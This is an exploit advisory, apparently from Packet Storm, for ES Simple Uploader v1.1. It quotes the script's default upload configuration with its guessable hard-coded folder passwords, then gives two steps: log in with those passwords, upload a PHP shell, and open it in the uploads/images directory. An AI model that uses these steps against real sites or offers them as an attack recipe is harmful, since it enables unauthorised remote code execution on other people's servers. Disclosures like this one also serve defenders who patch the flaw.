ES Simple Uploader version 1.1 suffers from a remote shell upload vulnerability.
54dc30ecf3cbb27ff67b6958fde5e71515fdb65a76bb7cae5b2d91f02dcd6776========================================================================================
| # Title : ES Simple Uploader v 1.1 Upload Shell Vulnerability |
| # Author : indoushka |
| # email : indoushka@hotmail.com |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : ES Simple Uploader v 1.1 (Powered by EnergyScripts) !talian Script |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : Upload Shell |
====================== Exploit By indoushka =================================
| # Exploit :
|
| $upload_dirs = array(
| "images" => array(
| "dir" =>"uploads/images/",
| "name" =>"Images folder",
| "password"=>"images",
| ),
| "docs" => array(
| "dir" =>"uploads/docs/",
| "name" =>"Docs",
| "password"=>"docs",
| ),
| "common" => array(
| "dir" =>"uploads/common/",
| "name" =>"Common files",
| "password"=>"common",
| ),
| );
|
| 1- http://server/script/index.php * loockup 4 password
|
| 2- http://server/script/uploads/images/Ev!l.php * 2find it
|
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed